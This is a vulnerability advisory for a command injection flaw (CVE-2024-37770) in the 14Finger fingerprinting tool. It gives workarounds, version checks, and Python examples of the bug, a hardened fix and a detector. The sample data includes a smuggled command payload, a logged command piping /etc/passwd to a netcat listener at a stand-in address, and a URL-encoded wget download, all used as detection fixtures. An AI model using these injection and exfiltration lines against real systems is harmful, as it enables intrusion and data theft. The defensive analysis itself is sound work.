CVE-2024-37770

9.1 CRITICAL

📋 TL;DR

CVE-2024-37770 is a critical remote command execution vulnerability in 14Finger v1.1: crafted input sent to the fingerprint function reaches a system command without adequate sanitization, so an attacker can run arbitrary commands with the privileges of the 14Finger process. Every deployment of the vulnerable version is affected, and successful exploitation can lead to complete compromise of the host.
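To make the bug class concrete, the following is an added illustration and not 14Finger's code: a hypothetical fingerprint helper that pastes a caller-supplied target into a shell command, beside a hardened version that validates the target and passes arguments as a list so no shell is involved. The tool name (curl), the target regex, the function names and the sample payload are all assumptions made for this illustration.

```python
import re
import shlex
import subprocess

# Hypothetical helper (NOT 14Finger's code): the target string is pasted
# into a command line that is later run with shell=True. Anything the
# caller puts after ';' or '|' becomes a second command for the shell.
def vulnerable_command(target: str) -> str:
    return f"curl -sI {target}"


def run_vulnerable(target: str) -> None:
    # The dangerous call pattern: shell=True on attacker-influenced text.
    subprocess.run(vulnerable_command(target), shell=True, check=False)


def shell_tokens(cmd: str) -> list:
    # Tokenize the way a POSIX shell would, so the injected command is visible.
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lex)


# Hardened version: accept only a hostname or IPv4 address with an optional
# port (assumed policy for this illustration) and never go through a shell.
TARGET_RE = re.compile(r"^(?:[A-Za-z0-9-]{1,63}\.)*[A-Za-z0-9-]{1,63}(?::\d{1,5})?$")


def safe_argv(target: str) -> list:
    if not TARGET_RE.fullmatch(target):
        raise ValueError(f"refusing target with unexpected characters: {target!r}")
    # A list argv goes straight to execve: no shell, so metacharacters are inert.
    return ["curl", "-sI", "--", f"http://{target}/"]


def run_safe(target: str) -> subprocess.CompletedProcess:
    return subprocess.run(safe_argv(target), shell=False, check=False,
                          capture_output=True, timeout=10)


if __name__ == "__main__":
    payload = "example.com; id"  # constructed attacker input
    print("shell would see:", shell_tokens(vulnerable_command(payload)))
    try:
        safe_argv(payload)
    except ValueError as exc:
        print("hardened version rejected it:", exc)
```

The hardened variant rejects the payload before any process is started; the allow-list regex does the real work, and the list-form argv removes the shell that would otherwise interpret the metacharacters.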

💻 Affected Systems

Products:
  • 14Finger
Versions: v1.1
Operating Systems: All platforms running 14Finger
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default configuration of 14Finger v1.1.

📦 What is this software?

14Finger is an open-source tool for fingerprinting web applications, that is, identifying the software and frameworks running on a target site. The fingerprint function named above is that core feature.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete system takeover with administrative privileges, data exfiltration, ransomware deployment, and lateral movement across the network.

🟠 Likely Case: Unauthorized command execution leading to data theft, malware installation, or system disruption.

🟢 If Mitigated: Limited impact with proper network segmentation, least privilege, and monitoring in place.

🌐 Internet-Facing: HIGH - Directly exploitable from the internet without authentication.
🏢 Internal Only: HIGH - Equally dangerous internally if attackers gain network access.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Multiple public proof-of-concept exploits are available, making this easily weaponizable.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: No official vendor advisory found

Restart Required: No

Instructions:

No official patch is available. Apply the workarounds below, or discontinue use of 14Finger v1.1 until a fixed release exists.

🔧 Temporary Workarounds

Disable or Remove 14Finger

linux

Completely remove or disable the vulnerable 14Finger application. The service and package names below are placeholders: if 14Finger was deployed from a source checkout or a container rather than a distribution package, these commands will not find it, so stop the process or container that runs it instead.

sudo systemctl stop 14finger
sudo apt remove 14finger
sudo yum remove 14finger

Network Isolation

linux

Restrict network access to 14Finger using firewall rules. Insert the iptables rule at the top of the chain (-I rather than -A) so that an earlier ACCEPT rule does not match first; ufw rules take effect only if ufw is enabled. These rules block all access, including legitimate users, which is acceptable for a temporary workaround; if the tool must stay reachable, allow only trusted source addresses ahead of the DROP rule.

sudo iptables -I INPUT -p tcp --dport [14Finger_port] -j DROP
sudo ufw deny [14Finger_port]

🧯 If You Can't Patch

  • Implement strict network segmentation to isolate affected systems
  • Run 14Finger under a dedicated unprivileged account so that injected commands do not inherit administrative rights
  • Deploy application-level firewalls with command injection detection rules

🔍 How to Verify

Check if Vulnerable:

Check whether 14Finger v1.1 is installed and running on the system. Any running instance of v1.1 is vulnerable, since the flaw is present in the default configuration.

Check Version:

14finger --version (if a command-line entry point is installed), or check the package manager:
dpkg -l | grep 14finger
rpm -qa | grep 14finger
For a source or container deployment, check the version recorded in the deployed code or the image tag instead.

Verify Fix Applied:

Verify that 14Finger v1.1 is no longer installed or running, and that no process or container is still serving it.

📡 Detection & Monitoring

Log Indicators:

  • Shell processes (sh, bash, cmd.exe) spawned as children of the 14Finger process
  • Unusual command execution patterns in system logs around the time of requests to the fingerprint function
  • Unexpected network connections from the 14Finger process or its child processes

Network Indicators:

  • Unusual traffic to/from 14Finger port
  • Command injection patterns in HTTP requests

SIEM Query:

source="*14finger*" AND (process="cmd.exe" OR process="/bin/bash" OR process="/bin/sh")

Field names depend on the log source feeding the SIEM. On endpoints the stronger signal is a shell whose parent process is the 14Finger process, so add a parent-process condition where the schema supports one; matching on process name alone will also catch legitimate shells.
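As an added, worked example of the two indicators above (not part of the original page and not tied to any particular SIEM): a detector that walks constructed process-creation events and flags shells spawned beneath a process whose command line references 14Finger, plus a scanner that flags HTTP request lines whose decoded query parameters carry shell metacharacters. The event schema (ts, pid, ppid, exe, cmdline), the request path /api/fingerprint, the parameter name and every sample line are assumptions constructed for this illustration; map them to your own telemetry's field names and the real endpoint.

```python
import re
from urllib.parse import unquote_plus
import json

# Constructed process-creation events in a generic JSON-lines shape
# (assumed schema: ts, pid, ppid, exe, cmdline). Not real telemetry.
SAMPLE_EVENTS = """
{"ts": "2024-06-10T09:00:01Z", "pid": 4100, "ppid": 1,    "exe": "/usr/bin/python3", "cmdline": "python3 /opt/14Finger/run.py"}
{"ts": "2024-06-10T09:00:05Z", "pid": 4101, "ppid": 4100, "exe": "/usr/bin/python3", "cmdline": "python3 /opt/14Finger/run.py"}
{"ts": "2024-06-10T09:01:12Z", "pid": 4207, "ppid": 4101, "exe": "/bin/sh",          "cmdline": "/bin/sh -c curl -sI example.com; id"}
{"ts": "2024-06-10T09:01:12Z", "pid": 4208, "ppid": 4207, "exe": "/usr/bin/id",      "cmdline": "id"}
{"ts": "2024-06-10T09:02:30Z", "pid": 4300, "ppid": 1,    "exe": "/bin/bash",        "cmdline": "bash -c /usr/lib/cron/run-backup.sh"}
{"ts": "2024-06-10T09:03:44Z", "pid": 4310, "ppid": 4101, "exe": "/bin/bash",        "cmdline": "bash -c cat /etc/passwd | nc 203.0.113.7 4444"}
"""

SHELL_NAMES = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
APP_MARKER = "14finger"  # same marker the SIEM query above keys on


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    # Works for both /bin/sh and C:\Windows\System32\cmd.exe
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_suspicious_shells(events: list, max_depth: int = 3) -> list:
    """Return shell spawns whose ancestor (within max_depth) is the app process."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["exe"]) not in SHELL_NAMES:
            continue
        anc = by_pid.get(e["ppid"])
        for depth in range(1, max_depth + 1):
            if anc is None:
                break
            if APP_MARKER in anc["cmdline"].lower():
                hits.append({"pid": e["pid"], "app_pid": anc["pid"],
                             "depth": depth, "cmdline": e["cmdline"]})
                break
            anc = by_pid.get(anc["ppid"])
    return hits


# Constructed HTTP request lines as they might appear in an access log.
SAMPLE_REQUESTS = [
    "GET /api/fingerprint?target=example.com HTTP/1.1",
    "GET /api/fingerprint?target=example.com%3Bid HTTP/1.1",
    "POST /api/fingerprint?target=example.com%7C%7Cwget%20http%3A%2F%2F203.0.113.7%2Fx HTTP/1.1",
]

# Shell metacharacters that have no place in a hostname or URL parameter.
META_RE = re.compile(r"[;|&`$<>\n]")


def flag_injection_requests(lines: list) -> list:
    """Return (line_no, param, decoded value) for parameters carrying shell metacharacters."""
    flagged = []
    for line_no, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 2 or "?" not in parts[1]:
            continue
        query = parts[1].split("?", 1)[1]
        # Split manually on '&' only: parse_qs treated ';' as a separator in
        # older Python versions, which would hide exactly the payload we want.
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)
            if META_RE.search(value):
                flagged.append({"line_no": line_no, "param": name, "value": value})
    return flagged


if __name__ == "__main__":
    for hit in find_suspicious_shells(parse_events(SAMPLE_EVENTS)):
        print("shell under 14Finger:", hit)
    for f in flag_injection_requests(SAMPLE_REQUESTS):
        print("suspicious request:", f)
```

The process-tree check is the higher-fidelity signal: the cron-launched bash on line 5 of the sample is ignored because nothing above it references 14Finger, while both shells spawned under the application are reported. The request scanner is noisier and is best used to pull the offending request for correlation with a flagged process.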
